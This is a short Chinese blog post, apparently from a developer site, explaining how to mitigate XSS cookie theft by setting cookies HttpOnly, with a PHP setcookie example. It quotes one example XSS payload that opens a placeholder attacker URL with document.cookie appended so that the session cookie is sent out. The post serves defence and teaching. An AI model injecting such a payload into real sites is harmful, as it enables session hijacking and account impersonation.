web安全之xss
1.生成cookie的时候设置httponly为true
如果脚本王子在A网站写入一段js代码:
<script>
window.open('黑客的url?c='+document.cookie)
</script>
当用户访问到这个页面的时候,就把当前用户在A网站的cookie发送到黑客的网站,这样黑客就顺利拿到这个cookie,就可以冒充当前用户了。
设置cookie的时候要开启httponly,让浏览器拿不到cookie。
setcookie ($name, $value = null, $expire = null, $path = null, $domain = null, $secure = null, $httponly = true)
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步